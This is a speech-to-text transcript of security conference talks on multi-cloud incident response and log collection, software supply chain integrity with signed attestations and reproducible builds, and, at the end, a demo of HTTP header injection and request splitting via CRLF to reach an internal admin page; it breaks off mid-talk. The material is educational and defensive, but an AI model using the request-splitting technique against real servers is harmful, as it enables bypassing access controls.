For Azure, you have the Azure activity. where you have default of 90 days. This one is also a bit tricky. You need to collect it from different places, which the cloud log collector handles. If you're on an Azure entry ID free tenant, you only have the audit and sign in logs for the last seven days. And if you have a license, you have the 30 days by default. If you're also on a free entry ID tenant, you will get an error when trying to collect the logs from the API, because they don't want you to the logs before the retention expires on the seven days so you can have actual retention without paying for it, so they'll just block you from interacting with the API. I'm pretty sure there's

a lot of people in this room who could bypass this by just scraping the data from the browser instead. So the cloud log collector, the whole intention behind it is just doing a really simple log extraction from multiple cloud environments in this weird circumstances where you need logs from different cloud environments, like this one. So, just quickly going to show you how the cloud log collector works. So, it's open source, I think it's on O3 Cybers GitHub, or my personal. It's called the cloud log collector. You can see there's just different functions that are really small for each of the cloud providers. We just call those different functions. We can use the same time frame. for all of the

cloud providers, we know we get logs within that same time frame, which is really nice. Now, of course, it depends on the retention of each cloud provider here. So if I put 400 days, I would only get Google Cloud logs for that far back. We can now run it, and we see it gets the Google logs first, where it uses the filter in terms of the time frame. It gets the token for Azure AD, and now it gets the logs for the different subscriptions, it loops through all. Now it tries getting entry ID logs, which fails. And here comes the tricky part. Like, imagine doing this manually for AWS, where you need to paginate, you need to go through every single region for every single AWS account to get

those 90 days of logs that are default. So this is also one of the reasons for writing the cloud log collector. Because in AWS CloudTrail, it's logged in each respective region, and it could be regions you're not using at all, where you have events because you didn't disable the region. And you can see there's also one region there failing in Canada. That's simply because the region isn't enabled in my account. And now it's going to go through all of those regions for all of the accounts.

And it's going to save that. into a JSON file. So each of the different cloud providers will have a JSON file with its pure log format. There's no normalization or anything happening here. And I'm going to show you why I don't bother doing that soon as well.

See, and there we go. So now we have different JSON files. So fairly simple, we can use the cloud log collector, get a bunch of JSON files with all the logs, down to our workstation. And now what? We have the logs, but what do we do with those? So, I have an architecture that I really like for efficient log analysis that I've used on instant response. And what I do is I just spin up an Azure Data Explorer cluster. It could be Google BigQuery or something else. I just like using Azure Data Explorer. And what I do is I upload the JSON file there. I'll show you exactly why and how. This is my Azure portal. I've created data explorer cluster for this purpose.

We're just going to access it through the web panel. We could also do all of the upload through API. We could put it in a storage account and all digest it. We already have the Azure and GTP logs in here, but we're now going to import the AWS logs as well, the Cloudflare logs, which is... So we'll create a new table, just choose the file that we got from the Cloud log collector, and there's 72 gigabytes, and it's going to process that really fast. You can see it does some normalization for us, so that's why I didn't bother doing this. And this is the really nice part. Now I have AWS, Azure and GCP logs in the data explorer cluster where I can query this. I could do

this locally using JQ as well, but if I have large data sets, it won't really scale. Well, for the data explorer cluster, I can choose whichever size. Let's get 10 random logs from the AWS index. Yay, it works. So, now we're going to look for something specific across all the logs. So, we're going to look for three IPs that we've gotten from someone else on the response saying these three IPs are known to be an indicator of compromise. We're now looking for those logs across GCP, AWS and Azure. And it goes super fast, no matter how much logs you have, because you can scale up the cluster. And we can see there's a match on the call rate IP and GCP. We know that the indicator is present

there. We can then look at AWS log and see that there's also a match on this one because we've filtered for it. And there we see the same IP being matched here as well. And now let's go down to Azure.

And we can see there's a match here as well.

If I change the IP now and just try to run again, you will see there's no results being returned, so it actually works to look through this data and find indicators that you're looking for. I could also be looking for other things such as actions, for instance, but those would be unique per cloud provider, but I could also normalise some actions that are known to be used or some techniques that are known to be used across multiple clouds by threat actors as well.

So the nice part about this is you can have one guy that's just collecting all the logs and just uploading it to the data explorer cluster. How you upload, it doesn't have to be through the console. Put it to some sort of storage blob or anything and just have it auto ingest. And then you can have your team analyzing those that are fetching the different indicators if you're working on a large scale incident and they can continuously analyze against the data set. And you can upload more data as you're able to acquire more data as well. And we could potentially have Alibaba cloud into the mix here as well and just ingest that into a

separate table. So, for the sake of this scenario, let's conclude that there was no signs of an active compromise affecting the cloud control plane or the cloud-based identities. So, what are some precautionary measures we can still take? we could go through all the access keys and just revoke them and, like, see what its usage are. Because, again, we only have a limited days of logs, so things could have happened before the time where we have logs as well. Since we only have seven days of sign-in logs as well, we could just revoke all the sessions and tokens to be sure, rotate all the secrets, and then look for, like, signs of persistence such as external trust being instilled.

Now, It's time to look at the data plane here and how we can leverage the control plane to investigate the data plane. Because in the cloud you can't really just fetch a disk like this. So I've already showed you how to get the logs with a cloud log collector. You could get disk images through the libcloud forensics which is open sourced by Google. And getting memory, I like to use a portable binary from Komae, which allows us to take a volatile memory dump. And I'll show you how to use this in the cloud context. So, libcloud forensics made a few adjustments. So, it runs, like, synchronously across multiple clouds. But what it does is it uses the different cloud providers APIs and then

copies or shares a disk based on the best practice to capture evidence in that given cloud provider and it then shares that with your forensic environment. So you can do this at scale as well, you can get copies of all the disks in the different cloud providers and you can then have someone analyze it and look for persistence or malware on the disk here. How about memory? Let's say we have a virtual machine with managed identity. This could be running in Azure, but it could as well be running in GCP or AWS, and it would work more or less the same way. So, quickly put together runcommand.py, which is able to execute code on the different hosts from the cloud control plane

on the different hosts in any given cloud provider. I'm just going to feed it my invoke memory collection.ps1 script, which is going to

on the virtual machine. The virtual machine is going to use its managed identity to authenticate to the cloud provider. It's going to download the binary from HTTPS. It could also be in a cloud storage where I have it free stage because it's already authenticated. And it's going to write the memory to disk. Now with the memory written to disk, it's going to again use its managed identity to upload the memory file to a storage account. I'm quickly going to show you how this works as well. So, you can see there's some arguments that's, like, cloud provider specific. We can use it on Microsoft Azure, we can use it on AWS, or we can use it on GCP, and we can feed it the exact same

script here. Let's see. Yeah. We just have functions to run it on the different cloud providers, and then we can trigger it as run command. Since we're going to run it on a Windows instance, we can feed it whatever PowerShell script we like. So, I have a superscript I use for taking memory dumps. I use it mostly for cloud environments. We download the Kumaya toolkit, which allows us to create a vaulted memory dump. When copying large files in Microsoft Azure, I like to use the AC copy, which is a binary, because it's handles way faster uploads than using the direct rest API for the storage account, or it could create something using the storage account SDK. But I just get the AC copy binary.

And based on that, we just run invoke ps Azure instant response memory collection. And we can now trigger that using the run commands. So let's just trigger this. We specify the cloud provider, Azure, the script path, is the script we just went through, the VM name, what resource group we're going to put it in, and subscription. Oops. Crap. Okay. There we go. Yeah. We run it quickly for Azure and AWS, and there we can see now there's a memory file uploaded here using only the cloud control plane in order to get the memory. So By using the cloud control plane we can interact with the data plane to get the different things we need. We could query for specific logs or anything on the different hosts.

If it was a Linux host we could just trigger something else like a shell script instead. So it gives you a wide array of opportunities just being able to leverage the cloud for its benefit. So we're done with our investigation for this and now we're kind of getting into the remediation part. So, the first thing, again, you want to kind of go back and look at how bad are things from a configuration perspective. So, there's open source stuff you can run, like Prowler. It kind of benchmarks your whole cloud environment, no matter which cloud you run in. I think it's really good. It kind of, like, compliance driven, gives you, like, okay, you're CIS compliant with this. But it also finds some

other neat stuff like misconfigurations that can potentially be exploited. Now,

also should make sure you've enabled all the logs for later. There's many ways to do it. It's also many tricky ways to get the logs out of the different cloud providers. You need to spend time and study how the cloud provider works, what logs are relevant, how do you filter this to not get immense volumes. And then I also like to do a more manual approach. So, okay, I might run Prowler, get, like, a high-level overview, but I also like to just dump all the resource configurations. So, If it's like Azure, I'll just dump all the Azure research manager objects and just look through everything. I'll do mostly control F and look for things I

know are bad or trying to look for secrets and try to map out the architecture. And based on, like, getting all the metadata and the configuration of the cloud, you can start to uncover attack paths. It requires a lot of patience for large cloud environments, but it's definitely doable, and you start seeing patterns after a while.

I think my conclusion is you should be adept to working with the SDKs and the REST API for efficient instant response in cloud environments. And although the cloud had no signs of compromise in this scenario, and it was only affecting the on-premises environment, it was a matter of time given the poor configuration that we uncovered. That's all I had for today. So thank you

Thank you very much Karim are you here for the rest of the day? I'll be here. Great. Thank you so much So now we have lunch until 1 if you Submitted any dietary restrictions or special needs in your registration that should be If you're coming downstairs, the food will be on the bar on the left and all the way at the back is the special order stuff. So that's where it is if you're looking for it and if there's something you need that you can't find, please let us know. Enjoy your lunch.

account for the number of people that we have, so it should be chairs enough for everyone. And the shirts have arrived! Yay! They are black and they were apparently printed this morning, so there you go, problem solved. I want to kick off the afternoon with Stian Kristoffersen, a long-time supporter of B-Sides and contributing member of the Norwegian InfoSec community. You may have already seen him downstairs in the hardware hacking village, sharing his time, expertise, passion, and some of his groovy gadgets as well. He's also been at the last two B-Sides events, I believe. This is the fourth. Fourth one. Yeah. Sorry, I stand corrected. Yeah, so. We should have had a prize or something for

that probably. Buy a drink later if you want. And this is based on the talks are all selected based on the feedback that we receive in the feedback form that you all will get and by our own of course selection committee's impressions of the abstracts and the previous work, so it's not pay to play, although we're happy to have Telenor as a gold sponsor along with Defendable and Mnemonic platinum sponsor. We don't ever choose talks based on who the sponsors are, so yeah, that's how it is. We don't sell the participants list, no amount of money, you're not getting it. Anyway, you for coming back for your fourth time, Stian. Take it away. Let's give it up for Stian. STIAN

BUSHMANN So thank you for the introduction. Happy to be back at B-Sides. So I work as a lead security engineer at Telenor, where I focus on software and supply chain security, which this talk is a part of. We're going to focus on the part today. So shout out to the people at Telenor and Hackeria that has contributed to this. Everything I'm going to show is open source at the supply chain tools organization on GitHub. So you can check it out there. It's still early days. It is experimental, but it's also a good time to get involved somehow if you would like to do that. So just I try to motivate okay, why do we care about

securing the software supply chain? So here we have a typical supply chain. You have the producer that produces some source code, upload it to say force like GitHub. Maybe there's a pull request review before it's being merged in. And then you're building the package, maybe on somebody's laptop, maybe in a GitHub action or something like that. And then you upload it to a package registry like PyPI or NPM before it's consumed by the consumer. And each package usually depends on the packages as well, so that's also part of it. So Salsa has this great overview of everything that can go wrong, which is basically everywhere. So on their website, they have a good list of actual

real life attacks on all of these eight places. We can divide this into three main categories. So you have your build threats, the source threats, and the dependency threat. I don't have time to give examples of all this, so I'm just going to highlight two actual attacks. So back in 2011, kernel.org was hacked. That's the home of the Linux source code, the Linux kernel source code. And not great, and they did some mitigations afterwards. And I think most people don't think about that you upload code to GitHub or something like that. And in most scenarios, you rely on GitHub not getting compromised for your security. So next up, we have a build example. That was the SolarWinds hack back

in 2020. It was part of a bigger attack against the US government where the attackers made a backdoor into the build process in a legitimate product by SolarWinds that was used by the US government downstream.

It's actual attacks and this is just like two of the many things that can go wrong and of course there might be You might be using different solutions for each of these steps So hopefully some motivation why we care about trying to secure all of this which is what the rest of the talk is gonna be about And these are the parts we're going to look at how to secure the build, the source threats, the dependencies, and we are going to use signatures to establish trust in both source code and dependencies. We need to establish trust in the keys of the producer, so we're going to look at that. And then we're going to conclude and bring everything together. So it's

worth noting that we are not covering That the source code that the producer creates is of poor quality or that it's malicious We're only looking at making sure that what the producer intended to create is what the consumer actually consumes in the end That hasn't been tampered with along the way So first up build integrity we're going to start at the end there because it's more mature there's more Specifications in this area and there's also more source code you can use to improve the security here. So first off we have the Salsa specification. So they not only do they have the great overview of the threats, they also have some levels you can use to get more maturity in the build process. So at the

build level one, you're basically saying that okay I have some attestation, maybe you say that okay I use this to produce this binary that has this hash. Then at level two, it's the same, only you sign that at the station. It should also run in a hosted platform rather than on somebody's laptop. At level three, there's more requirement to harden the build platform. Typically that means that you're running each build in a separate VM. And also,

that the signing keys should not be directly available to the build process. So if the build process is fully compromised, you can't sign whatever artifacts you want. We can do better than this by using transparency logs. So transparency logs can keep track of when the signing key is used. So basically, when you do a release, you record it to this immutable log. you can make sure that there was only one version 1 release. There's not another malicious version that exists on the side. So that's sort of the main use case, so you might be able to detect something before it happens. Or if after a compromise, you can use this for forensics to see how, like when this thing was introduced.

Yeah, so this is based on Merkle trees, and if you're interested, you can read up on specifications on this stuff. So we're going to use the SigStor transparency log, which is like the main two projects this consists of is the Recore, which is the actual transparency log. And then you have FullSeal, which is a way to sign stuff on the transparency log using OIDC tokens, which is exactly what NPM did when they introduced this in 2023.

So basically, you have your GitHub action that is using the ODC token of the action to be able to sign at the stations that are included in the record transparency log. And then you upload both the station and the binary to the MPM registry. And when you do that on the mpmjs.com page, if you scroll to the bottom, you'll get our provenance.

with the relevant information to be able to verify that yes, it's indeed built and released correctly. So this is exactly what Homebrew did as well this year back in May. It's still opt in to actually verify the integrity of each Homebrew package you install, but hopefully in not too long it will be on by default to

this attestation. So both intoto and sorry, so both MPM and Homebrew use intoto as the attestation format. So I talked about that they both produce provenance and basically the file format of that provenance is intoto, which is just a structured, standardized way of storing that data. It can also be used to describe how each build step should work and be able to verify it. We're not going to use that here. We can do even better with reproducible builds. So Google's definition, running the same build commands on the same inputs is guaranteed to produce bit by bit identical outputs, which means that we can always get the same byte given the same source code, basically. So that takes us to the

release process we have in the example report, which we're going to look at shortly. So you push a tag to GitHub. That triggers the Salsa workflow, which runs in a separate VM that we don't control. And the Salsa builder is created by the Salsa people. not us, meaning that when they produced the bits, if you trust them, you can trust that the transformation was done correctly. So it's included. So it's signed with Fulcio, like for MPM and Homebrew, and then included in ReCore a similar way. Then the binary and the attestation data is uploaded as a release to GitHub. we can then download and we can reproduce the binary locally to verify that it's the same bits and then we can countersign it to show that yes we also

got the same bits as the salsa builder. So overall giving very high assurance that what the producer as a consumer gets in the end is what was intended. So that takes us to the first demo.

So here I'm in the release prototype repository. I'm just going to quickly look at the workflow. Scroll down to the bottom. You can see that I used the Salsa builder. So this is a Go project. And it takes the source code and produces the binary. So let's look at what was produced.

Here we have release 004, and we have the binary itself, and we have the Intoto attestation. So if I pop over to the terminal, I can verify that the Salsa release worked in the correct way. So they have a verifier. And we're going to verify the artifact, which is this file. And we have the provenance here.

expecting it to originate from the release prototype repository, and we expect it to be version 004. So if I run this, it passes, it's happy, meaning that the salsa part of this passed. Then I talked about that we can reproduce the binary locally. So I'm going to do that. I have a reproducible build script. which produces the binary. You can do a shorty 56 of that. And we can then see that that's the same hash that we got in the attestation. So I only verified the attestation file. I didn't show it to you. So let's do that.

So DSSE is called dead simple signing end envelope. And it's the wrapper around the attestation. And we just made a CLI to make it easy to extract. Need to do that in total. So here there's going to be a bunch of extra data from the build. If we scroll to the top here, we should be able to see that the most important part is the file name and the hash, which is the same hash as we got when we reproduced this locally. So what we can do next is that there's two signatures in the in total association, not just one. So if I do just get the file here, we see that there's actually a list of signatures. So the first one is from

the salsa builder, and the second one is the one I countersigned after verifying the build. So we can extract the signature.

just using JQ into a file, and then we can verify that signature using SSH. So it's a good signature. In the future, this should be more smooth, but it was what I had time for this demo. So end result is that we get very high assurance in that it's verified reproducible, it's also level three, it's built in an isolated VM, And it's also added to this transparency log so that we can make sure that this is the only version 004 build and there's no other malicious version.

So that was the build part. So let's move on to source integrity. To warm up in

if you don't sign your commits, it's possible to spoof the identity. So the committer email and the author email is just metadata that you can tamper with. So you can pretend to be some other person that might be more trusted in the project you might try to attack. So if you sign the commits, there will be this verified box. If it's signed with a key that GitHub doesn't recognize, it's marked as unverified rather than wrong or malicious. And if you don't sign your commits, it's just going to be blank. So what you should do is to sign your commits, you should turn on Vigilant mode. That always includes the verification box if it's correct or not. And then you should then force sign the commits in

the branch rulesets. Moving on to a bit more advanced attacks, first we need to have a high level understanding of how the Git metadata works. So you have your branches, say main or a tag, that points to a commit. And then each commit points to the parent commit, which can be one or more commits. So both commits themselves and the annotated tags can be signed. the pointers themselves are not signed. So that's where the attack comes in.

There is some mitigation for this, called sign pushes, that kernel.org introduced after the hack, but it's not supported by GitHub, so we can't use it there. So let's look at some attacks. So this is from a paper from 2016 by Santiago et al. These are the three main attack types. So you have rollback where you point, say, the main branch to an older commit rather than the most recent commit, and then you just hide that the more recent commit existed. So you're rolling the history back. Next, we have teleportation where instead of pointing to the right commit, you're pointing to some other commit in the repository. And at least if you're signing the commits, it needs to

point to us commit signed by the correct key, but it might still be possible to do an attack. And of course for both the rollback and teleportation, as an attacker what you want to do is that there might be a non-vulnerability or some other functionality you want by doing this attack, right? So you're getting the source code you're looking for. Then there's the deletion, where you basically just delete branch and all the commits, which is more of a denial of service or something.

So this is partly, some of this is made harder by just how Git works in general, but to get even better integrity protection, we've created a new tool called Git release where we're verifying more of this stuff. And one of the main insights and how we can verify the integrity is by using merge commits. So, like using merge commits in Git is optional, but if you enforce it, you get some extra properties. So basically, in a merge commit, the left parent is the previous commit on the same protected branch, but the right parent is the feature branch you're merging in. use this geometry to enforce some invariants. And we can anchor this by saying that, okay, we expect this commit to exist

on this protected branch, which reduces the rollback window to these commits, because we can't know if there's a new commit. But then each time we see a new commit, we can add that and make the window smaller. Also this type of merge commit will not naturally occur in normal git use as we also prevent the teleportation attacks So I don't have time to talk more about this. So there's more details in in the repository as you can look at the threat model there So we have the same release process as earlier But before we push the tag we're going to use this git verify tool and we're also going to use the release tool, which I'm now going to demo. So if you jump over to

the repository, I can run git verify, and it's validating as okay, that's great, so then it's run a bunch of tools. The tools, rules, and the rules are listed here, so we have a bunch of identities with

We have what kind of roles the different identities have. So here we have three maintainers. We have a bunch of rules that are applied. So for instance, the require merge commit is true. And we can also require up to date that tags have to be signed. We're using SSH signatures, so that's turned on. And we're also using hardware keys to sign the commits, so then we can also that the user actually touched the hardware key when doing the commit, and there's also support for requiring entering a pin or something on the security key. You can optionally allow the Fort itself to do commits, either merging pull requests or do actual content changes. Then we have a list of Protective branches,

which is main here, and the list of repositories. So the UI for the repository, and we have both SHA1 and SHA2 in case of SHA1 collisions. And this is how we anchor it, again, as I mentioned. So that's verifying the source integrity. And then when you do a release, you can release using git release, which will create both the git tag also the tag link which is an attestation like I showed before with the binary. So let's look at how the tag looks.

So here we include some extra metadata as the tag metadata field in the tag. And if you look at that

we can see that there's some extra information included. So we have the repository URI in here. So that is to prevent that there might be a teleportation attack to a different repository. So say, doing forks in GitHub, very common. And if you do a release on a fork, you don't want that release to be

mistaken for a release from the upstream repository. So that's why we include that. We do SHA1 and SHA2 of the commit itself. We also have the previous tag. What this does is that you get an ordering of all the releases. So when you send release to the build server from typically a forge, the forge can't omit the release or reorder the releases without the build server being able to detect that. We also have some extra protected branches metadata, which is useful to detect more of these teleportation and rollback attacks. So that concludes this demo. So basically, we can have a higher assurance in the source code and in the release itself before we continue with the same build steps

before. And tying those better together is a route for the future.

Next, we have dependency integrity. We're using Go, so we already get a lot of functionality from the Go language itself. It has a transparency log for the releases with all the same benefits as I talked about already. Maybe you don't trust the hashes you get from Go itself, and you want to verify that they are consistent with the hashes from the upstream source code. So going back to the release prototype repository, I can look at the dependencies for this project. And it's depending on the Go sandbox project in the same org.

given version. So then I can go upstream to that repository and see that, okay, git verify, verifies that source code integrity is correct. And then I can run go hash to recreate the checksums and see that, yes, they are the same as I'm getting from Go itself. So basically the checksums are stored in go.sum and

It's the same here as in the one we recreated. So then again you have very high assurance in that it's exactly what you expected to download as a dependency.

So apart from the Sigstore stuff where we don't have to store the keys of the maintainers because using in that YDC token and to get out those keys for the other stuff where the maintainer is signing the commits and the counter signing the Binary release and stuff like that we need to establish trust in the developer keys. This is a hard problem which Many have tried to solve before Here we're going to look at our variants based on the update framework and The update framework is a specification to establish trust in a set of keys that are then used to update the next set of trusted keys. It's what's being used in SIG Store to

establish root-trust there. So I think Tuff is pretty good, but for smaller projects it's can be a bit much to set up. So I'm sort of suggesting a more lightweight version, but also some extra metadata to protect against key reasons and stuff like that. So it only lives on this branch right now, the Tuftish branch in the root to trust repository. And the main idea is this, that you either already trust the developer, maybe you met physically at the conference, already trust projects and then you can use one to establish trust in another or simply that you're downloading source code or binaries for the first time and then you use trust on first use to establish trust in a set of keys and then

those keys can update themselves over time. That's the point of root.json which is part of the Toast spec. It delegates trust to targets JSON, which is also part of Tuff, which can delegate trust further to, say, the git-verify JSON config I showed you. So that's sort of the idea. This is like draft stage. But I think it could be useful. So one use case could be that distros, when they package stuff, they could establish trust in a project like this, and then over time, make sure that they and getting the right source code to package in their distros. Okay. So, sort of sum it up. There's a lot of things, a lot of moving parts to harden the supply chain.

For the verifier, hopefully we can reduce it to three steps. establish trust in some keys, then you download the package, and you verify the attestation. And then you're good to go. And if you want further assurance, you can verify the integrity in the source code, and you can reproduce the build and verify all of the dependencies recursively. And ideally, there would be more people verifying that the builds and transparency logs and all of that. I think the main challenge going forward is to get something that scales, something that's easy enough for a lot of people to implement so that it's not just the big flagship project that uses this, but it can also be used by a smaller open source project that are still important

for a lot of people. So we are looking for people to help secure our cloud native platform. So feel free to visit our stand or come talk with me. And we also have a CTF that's live now at this address. And I think it's open until 6. But you have to be physically here to be eligible for our prices. And with that, thank you for your attention.

Thank you, Stian. Does anybody have any questions for Stian about end-to-end supply chain security? How some of this might apply to your own SDLCs that you're working in? Yes. Mr. Ingebretson, over. You always sit as far away from me as you can. You mentioned that GitHub didn't have some of these features and you sort of that you wanted it. How about the other vendors of Git out there, like GitLab, or is there anybody better that has implemented more of this? Also, in terms of show two support, GitLab have experimental support that they added in August. So I guess that's a bit better. In terms of design pushers, I don't think anybody has that. GitHub, one thing they do have is that they have a private

version of SIG store. So they basically run one SIG store for all customers of GitHub. And then you can use that as at the station, which is not public, instead. The downside is that you can't do a full audit of the log when you use that.

Anybody else? I have a question. What do you think will be the main drivers to build this stuff implemented in SDLCs? Is it companies trying to manage their own risk, or do we have standards coming that will, or audits of existing standards that will look closer into the vendor's SDLC? Sure. So there's some EU regulation coming. Maybe that will help. But I think for the smaller open source projects, it's making it as easy as possible to do it. So that's what MBM and Homebrew and PyPy and others are working on it as well to make it as easy as possible to implement this. And I think that's key to do it. I think for companies, they're mostly going

to do it internally, right? So it's not going to be visible in most cases. All right. Anybody else? No? You're here. Yep. And you're also at the hardware hacking village, so can find Stian there and ask him about hardware hacking or supply chain and any number of other topics potentially. Thank you very much once again, Stian. Thank you.

All right. And moving on, we did get the shirts, as I mentioned, so you ordered a shirt or if you are not sure if you ordered a shirt, you can go check with Pineda. She's around downstairs. And we have, yeah, we're good. We're ahead of schedule this afternoon. What is going on? Incredible. Do we wait or do we stop? No, I think we just get going. All right. Excellent. Yeah, nobody feels like you're them and their break. No pressure. So we have Sofia Lindqvist on HTTP injection attacks. Take it away. Thank you very much. So I'm Sofia. I'm going to talk to you about HTTP header injections, splitting headache. So really my title should mention

request splitting but I wasn't able to make as good of a pun using that. So header injections it is. We will talk about that as well. A couple of words about myself. So I started out doing a PhD in pure maths. Luckily, I came to my senses and realized that academia was not the place to be, definitely not in pure maths. So I instead worked three years as a developer at Cisco, where I was working on the operating system, which runs on the carrier-grade routers around the world. And then eventually, I made my way over to security testing and pen testing, which I've been doing for two years now. Currently, I'm at binary security.

a rough outline of what I'm going to talk to you about today. So I like covering my bases. So I'll go through kind of the basics of the vulnerability we're going to be talking about first. Then I'll show you a demo of how things actually function. Then I'll be talking about hunting for this vulnerability in the wild. Show you a real world demo, and then talk a bit about things in Azure. If you know all of this very well from before, the first bit might be boring. You can then wake up for the first demo. If you were present at Sikkerhetsfestival in August, where I gave a slightly shorter version of the same talk, then

you can wake up at around the second demo. Right. So let's start from the beginning with a typical HTTP request. So this is what happens if I, in Firefox, I go to binary security.no and I click the About tab. My browser will send this HTTP request. Now some of these headers and things are a bit long and annoying, so I'm just going to shorten that a bit and say that this is what the request looked like. essentially the same thing. So the first thing we need to understand is what's up with these funny symbols at the ends of the lines. So this backslash R backslash N business is what we refer to as CRLF. So it's two control characters. The first one is referred to as carriage return, and

the second is the line feed, shortened as CR and LF respectively, or CRLF for the combination. So if you use, for example, Windows, you might recognize this as the like, this way to make a new line in Windows text documents. This is also the way HTTP version 1.1 has decided you'd delimit the different parts of the request. So, to make it clear what's happening, I'll always explicitly write out the CRLFs in my requests, but I'll also have a visual new line to make it easier to read for us humans. Okay. With that out of the way, here's our HTTP request again. The first line is what we refer to as the request line. It has

three parts. The first is the HTTP method, which in this case is get. That could be get, post, delete, whatever, and tells you what you're doing, basically. The second part is the path we are trying to access, the resource, so in this case the about page. And the third part is the protocol version. So for the purpose of this talk, we'll always be dealing with HTTP version 1.1, because HTTP version 2 does header things very differently and is not vulnerable to the attack we're talking about today. Luckily for us, most of the internet still lives in 2015 or whatever and does HTTP version 1.1. OK, then we have these four lines, which are what we

refer to as HTTP headers. So each header has two parts. It has a name and then a colon and then a value. And the way you end one header name value pan, start the next is with the CRLF character sequence. I didn't say, but the reason why I write that as backslash R backslash N is because in most programming languages, that is the escape sequence to actually make these control characters. And then, finally, when you are done with all your HTTP headers, you have this single blank line, if you will, or just a single CRLF, which signifies that we are done with the HTTP header section. Now, in some requests, you'll also expect to see a HTTP body after the header section, but for this talk, we only ever

really care about the headers, so let's pretend like once you've finished the HTTP header section, you're done with the request. Okay, so with that out of the way, we do need to say a few more words about HTTP headers. So the header name, that's the thing before the colon, may consist of any printable ASCII character except for white space and the characters in this list here, so like brackets and things. The value has slightly fewer restrictions, so it may basically be any non-control ASCII character. Notably, both CR and LF, these special control characters, are banned in both of these two, so both in the name and the value. And if you stop and think about it for a second, it kind of has to be like this, because if

the way I delimit one header name value pair and start the next is with CRLF, then things would be highly ambiguous if I suddenly can have CRLF within the value itself. I wouldn't be able to distinguish that. There's a slight asterisk here, which is this concept of line continuations, but we won't deal with that today. Right. So anyone who's ever read a specification or a C or, you know, been given instructions this is how it should work and tried to implement it knows that no one ever implements anything correctly. Maybe a slight exaggeration there. So let's instead take a look at what happens if I have an HTTP client or server which doesn't follow these

rules properly. So here is a highly constructed example where I have a server which is planning on making the following HTTP request. So I'm going to get the about page of binary security, and I'm going to include a HTTP header named some header with a user controllable value, whatever that means. So me as the user, the malicious user here, figures out I'm going to go and see what happens if I try to send CRLF characters into this header value. might try inputting a value like this. So a value of blah. I then insert the CRLF characters and then something which looks like another valid header name value path. If I just input this straight in place of the user controllable value placeholder here, this will look something like

the following. So again, I've added visual newline to make it obvious what's happening here. It's the CRLFs themselves, which actually determine that you've started a new header name value path. And what actually happens here is that you've injected a whole new header which the server didn't intend to include originally. But we don't need to stop that. We can actually take this one step further. Instead of injecting just the header, let's inject a whole request. So returning to the same example, let's try inputting something like this. So again, let's have a value of blah. We a CRLF to terminate that header name value pair, and then we have another CRLF which is like the end of the request itself, followed by something which looks like a second well-formed HTTP

request. So, again, inputting things and adding some visual new lines to make it more legible, and actually we can make it even more clear what's happening by adding a bit of space here. And what we see is that we end up with actually two completely valid HTTP requests. The second request, which is getting the smuggled resource, is what we would refer to as the a request, a smuggled request, or like request splitting. So we had a server here who intended to make a single request. Me, the malicious user, made it make two requests instead. With that out of the way, we are ready for our first demo. So I've written a bit what's going on here, but we don't actually need to read that. That's just backup in case

of technical issues. Okay, so on the right-hand side here, I have a terminal where I've SSH'd to a server. in the quickest and dirtiest way possible, which is hosting various hosts. Let's see if we have some access logs. So the first page we have is an internal site, which on the left-hand side I'm trying to access this internal site from the Internet. hand side I can see from access logs that, okay, here's my IP if anyone wants to know it, is trying to get this resource, and that returns a status code of 403 forbidden, which is what we also see on the left hand side. This was expected because this internal site is meant as like a resource you

can only reach from local host itself on the server. So to make things more interesting, we have a second host as well. So that will be, I have it here, nice, let's see. page called basic demo.site. To see what's going on there, we need to look at some different logs. Let's see. Let's try that again. Here we see I'm accessing this page. I'm getting the root resource and returning a status code of 200. Okay. What this is actually doing under the covers, when I talk to basic demo, what it's going to do is it's going to ping an internal status page on the not ping, it's going to get an internal status page from this internal site, and then it's going to give

the return code back to me, the end user. So this got 200 OK back from the internal resource. To see what that looks like, we go back to the access logs for the internal site. And we see here that there's coming requests from local host itself. Now this is going to get mighty confusing if we can't actually see the requests on the headers which are going in and out here. So I've attempted to do some bash magic, and we'll see if this works. now visit basic demo.site, then I get to see the requests which are made. The first request being made here, that's the one I'm making from the outside here to basic demo.site with all the HTTP headers my browser is adding for me. And then that is

internally making a secondary request to the status.html page of this internal.site. Now, this in itself is not terribly interesting. We need some more ingredients for anything to happen here. This page also takes a query parameter. I think that's going to break. Let's see. Let's try doing that. This takes a second parameter called name. What it's going to do when I make this request with name equals Sophia is in the secondary request, it's going to append this custom header named XCustom header. Let me put that high up just in case. So we have this custom header here with a value of Sophia. Okay. So as the malicious users we are, this is a prime target for attempting CRLF injection. Because

what I can see is that as the end user, I'm inputting user controllable value here on the left-hand side in the browser. And what's happening is that the server which I'm talking to is going to input my value into a request it's making. So let's attempt to do CRLF injection. So, what I would want to do is input something like the following. I don't know if you guys can see that at the back. Let's lift that guy up. So, I basically want a value of like Sophia and then a CRLF and then something else which looks like a valid header. To actually input this, we need to URL encode things. So, I've cheated because I

will typo that. Let's see if we manage. So, let's bring that guy up again, if I can. So, here is the request I'm making from the outside. is the secondary request being made to internal.site. We have the X custom name header, and we also have an injected header with the value of it works. Okay. So that is HTTP header injection in practice. Next, of course, as predicted, we will now do full request smuggling or request splitting. So what we now want to do is some like the following, input a value, CRLF to end that header, CRLF to end the whole request, and then a second thing which looks like a fully formed HTTP request. So copying that, we end up with moment of truth, let's see.

Here is the first request I made, here is the expected status request, but that is a third rogue request down here to the page admin.html on the internal site. So this is the smuggled request in this case. And to prove to you that this isn't just my logs which are badly formatted, we can go back to the access logs for the internal site. And we see that, indeed, two actual requests are made here. One to the status page, and one to the admin page below. All right. So you are now all experts on request splitting through CRLF injection. You can do request splitting in many other ways as well. This is just one of many. shown you how to do this, but I haven't actually told

you why this is a security vulnerability as opposed to just a stupid bug. So we should talk a bit about impact. So the set up here is the following. We have a server which intends to make a single request, but the attacker causes it to make multiple. That's kind of a very high level view of what's going on. So what can we do with that? Well, first of all, we can use it to bypass internal access controls. So actually we did exactly that in this first demo because the internal site wasn't actually reachable from the internet. It was only reachable from local host. But because my second request was being made by the server itself,

it was able to talk to the internal site. Equally, there's not really any reason why this internal site needed to be reachable on the internet at all. That was just so I could show you it existed. Really, you'd put it on like an internal IP, right? But you can still reach it from the server. itself, which is making the quests. The second thing you might be able to do is bypass client authentication. So in the typical kind of modern world of complicated web applications and things, you'll have some kind of load balancer which is talking to a bunch of internal hosts which are all talking to each other and everyone is doing stuff. And what you'll commonly see is that internal services to talk to each other,

